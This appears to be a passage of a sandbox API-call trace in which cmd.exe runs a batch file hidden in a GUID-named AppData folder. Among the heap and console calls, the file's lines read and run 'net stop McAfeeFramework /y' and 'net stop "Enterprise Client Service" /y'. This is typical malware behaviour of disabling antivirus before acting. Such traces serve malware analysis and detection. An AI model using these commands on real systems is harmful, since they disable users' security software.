(lpName="=ExitCode", lpValue="00000002") returned 1 [0211.246] GetProcessHeap () returned 0x3e0000 [0211.246] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.246] GetEnvironmentStringsW () returned 0x3f8408* [0211.246] GetProcessHeap () returned 0x3e0000 [0211.246] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.247] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.247] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.247] GetProcessHeap () returned 0x3e0000 [0211.247] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.247] GetEnvironmentStringsW () returned 0x3f8408* [0211.247] GetProcessHeap () returned 0x3e0000 [0211.247] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.247] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.247] GetProcessHeap () returned 0x3e0000 [0211.247] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0211.247] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0211.247] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.247] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0211.248] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.248] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0211.248] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.248] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0211.248] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.248] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0211.248] SetConsoleInputExeNameW () returned 0x1 [0211.248] GetConsoleOutputCP () returned 0x1b5 [0211.248] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0211.249] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.249] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0211.249] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0211.249] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.249] SetFilePointer (in: hFile=0x78, lDistanceToMove=4922, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x133a [0211.249] GetProcessHeap () returned 0x3e0000 [0211.249] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0211.249] GetProcessHeap () returned 0x3e0000 [0211.249] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0211.249] GetProcessHeap () returned 0x3e0000 [0211.249] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0211.249] GetProcessHeap () returned 0x3e0000 [0211.249] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0211.249] GetProcessHeap () returned 0x3e0000 [0211.249] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0211.249] GetProcessHeap () returned 0x3e0000 [0211.249] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0211.249] GetProcessHeap () returned 0x3e0000 [0211.249] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0211.249] GetProcessHeap () returned 0x3e0000 [0211.249] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0211.249] GetProcessHeap () returned 0x3e0000 [0211.249] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0211.249] GetProcessHeap () returned 0x3e0000 [0211.250] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0211.250] GetProcessHeap () returned 0x3e0000 [0211.250] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0211.250] GetProcessHeap () returned 0x3e0000 [0211.250] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0211.250] GetProcessHeap () returned 0x3e0000 [0211.250] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0211.250] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.250] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x133a [0211.250] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x587, lpOverlapped=0x0) returned 1 [0211.250] SetFilePointer (in: hFile=0x78, lDistanceToMove=4951, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1357 [0211.250] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop McAfeeFramework /y\r\n\r\n\nServiceΓÇ¥ /y\r\n¥ /y\r\nures\r\nnded\r\n") returned 29 [0211.250] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.250] GetFileType (hFile=0x78) returned 0x1 [0211.250] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.250] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1357 [0211.251] GetProcessHeap () returned 0x3e0000 [0211.251] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0211.251] GetProcessHeap () returned 0x3e0000 [0211.251] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0211.254] _tell (_FileHandle=3) returned 4951 [0211.254] _close (_FileHandle=3) returned 0 [0211.254] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0211.254] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0211.254] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0211.254] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0211.254] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0211.254] _wcsicmp (_String1="net", _String2="CD") returned 11 [0211.254] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0211.254] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0211.254] _wcsicmp (_String1="net", _String2="REN") returned -4 [0211.254] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0211.254] _wcsicmp (_String1="net", _String2="SET") returned -5 [0211.254] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0211.254] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0211.254] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0211.254] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0211.254] _wcsicmp (_String1="net", _String2="MD") returned 1 [0211.254] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0211.254] _wcsicmp (_String1="net", _String2="RD") returned -4 [0211.254] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0211.254] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0211.254] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0211.255] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0211.255] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0211.255] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0211.255] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0211.255] _wcsicmp (_String1="net", _String2="VER") returned -8 [0211.255] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0211.255] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0211.255] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0211.255] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0211.255] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0211.255] _wcsicmp (_String1="net", _String2="START") returned -5 [0211.255] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0211.255] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0211.255] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0211.255] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0211.255] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0211.255] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0211.255] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0211.255] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0211.255] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0211.255] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0211.255] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0211.255] SetErrorMode (uMode=0x0) returned 0x1 [0211.255] GetProcessHeap () returned 0x3e0000 [0211.256] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0211.256] GetProcessHeap () returned 0x3e0000 [0211.256] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0211.256] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.256] GetProcessHeap () returned 0x3e0000 [0211.256] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0211.256] GetProcessHeap () returned 0x3e0000 [0211.256] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0211.256] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0211.256] GetProcessHeap () returned 0x3e0000 [0211.256] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0211.256] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.256] GetProcessHeap () returned 0x3e0000 [0211.257] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0211.257] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0211.257] GetProcessHeap () returned 0x3e0000 [0211.257] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0211.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.258] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.258] GetLastError () returned 0x2 [0211.258] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.258] GetLastError () returned 0x2 [0211.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.259] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.259] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.260] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.260] GetLastError () returned 0x2 [0211.260] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.260] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.261] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.261] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0211.261] SetErrorMode (uMode=0x0) returned 0x1 [0211.261] GetProcessHeap () returned 0x3e0000 [0211.261] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0211.261] GetProcessHeap () returned 0x3e0000 [0211.261] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0211.262] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.262] GetProcessHeap () returned 0x3e0000 [0211.262] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0211.262] GetProcessHeap () returned 0x3e0000 [0211.262] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0211.262] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0211.262] GetProcessHeap () returned 0x3e0000 [0211.262] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0211.262] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.262] GetProcessHeap () returned 0x3e0000 [0211.262] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0211.263] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0211.263] GetProcessHeap () returned 0x3e0000 [0211.263] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0211.263] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.263] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.263] GetLastError () returned 0x2 [0211.264] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.264] GetLastError () returned 0x2 [0211.264] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.265] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0211.265] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0211.265] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.265] GetLastError () returned 0x2 [0211.266] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0211.266] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0211.266] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.266] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0211.266] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0211.266] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0211.267] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.267] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop McAfeeFramework /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop McAfeeFramework /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop McAfeeFramework /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x578, dwThreadId=0xc8)) returned 1 [0211.271] CloseHandle (hObject=0x78) returned 1 [0211.271] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.271] GetProcessHeap () returned 0x3e0000 [0211.271] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.271] GetEnvironmentStringsW () returned 0x3f8408* [0211.271] GetProcessHeap () returned 0x3e0000 [0211.271] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.271] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.271] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0211.455] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0211.455] CloseHandle (hObject=0x74) returned 1 [0211.455] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0211.455] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0211.456] GetProcessHeap () returned 0x3e0000 [0211.456] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.456] GetEnvironmentStringsW () returned 0x3f8408* [0211.456] GetProcessHeap () returned 0x3e0000 [0211.456] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.456] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.456] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.456] GetProcessHeap () returned 0x3e0000 [0211.456] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.456] GetEnvironmentStringsW () returned 0x3f8408* [0211.456] GetProcessHeap () returned 0x3e0000 [0211.456] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.457] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.457] GetProcessHeap () returned 0x3e0000 [0211.457] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0211.457] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0211.457] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.457] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0211.457] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.457] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0211.457] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.457] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0211.457] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.457] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0211.458] SetConsoleInputExeNameW () returned 0x1 [0211.458] GetConsoleOutputCP () returned 0x1b5 [0211.458] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0211.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0211.458] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0211.458] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.458] SetFilePointer (in: hFile=0x74, lDistanceToMove=4951, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1357 [0211.458] GetProcessHeap () returned 0x3e0000 [0211.458] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0211.458] GetProcessHeap () returned 0x3e0000 [0211.458] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0211.458] GetProcessHeap () returned 0x3e0000 [0211.458] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0211.458] GetProcessHeap () returned 0x3e0000 [0211.458] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0211.459] GetProcessHeap () returned 0x3e0000 [0211.459] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0211.459] GetProcessHeap () returned 0x3e0000 [0211.459] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0211.459] GetProcessHeap () returned 0x3e0000 [0211.459] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0211.459] GetProcessHeap () returned 0x3e0000 [0211.459] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0211.459] GetProcessHeap () returned 0x3e0000 [0211.459] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0211.459] GetProcessHeap () returned 0x3e0000 [0211.459] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0211.459] GetProcessHeap () returned 0x3e0000 [0211.459] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0211.459] GetProcessHeap () returned 0x3e0000 [0211.459] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0211.459] GetProcessHeap () returned 0x3e0000 [0211.459] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0211.459] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.459] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1357 [0211.459] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x56a, lpOverlapped=0x0) returned 1 [0211.460] SetFilePointer (in: hFile=0x74, lDistanceToMove=4996, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1384 [0211.460] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=45, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Enterprise Client ServiceΓÇ¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 45 [0211.460] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.460] GetFileType (hFile=0x74) returned 0x1 [0211.461] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.461] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1384 [0211.461] GetProcessHeap () returned 0x3e0000 [0211.461] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0211.461] GetProcessHeap () returned 0x3e0000 [0211.461] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0211.464] _tell (_FileHandle=3) returned 4996 [0211.464] _close (_FileHandle=3) returned 0 [0211.464] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0211.464] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0211.464] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0211.464] 